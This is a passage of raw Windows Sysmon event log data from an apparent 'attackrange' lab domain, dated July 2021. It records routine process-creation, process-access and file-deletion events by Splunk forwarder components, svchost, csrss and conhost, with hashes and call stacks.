AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.563{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0D89CBF506CB439219E8F32451D302F,SHA256=D1824C29E002FE360C73B70AFC3610E7134496CB1E5986FD374B4505895BE940,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.220{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:27.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A036E3183A666039DCDFD5D5B89DAEA,SHA256=00394804CF256D9BD911C71E7948F6350B5A5AF66DD9B5282138DE6D5E7CF910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A94671EACC594D1DA42A5C77BF805AD,SHA256=A18FCF3A9A0763BF79E6FE115E4EF9E31FCC530E78472D136B24DA88FA8EDF1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.751{0C1E0330-F803-60EB-DA79-00000000D001}30683132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program 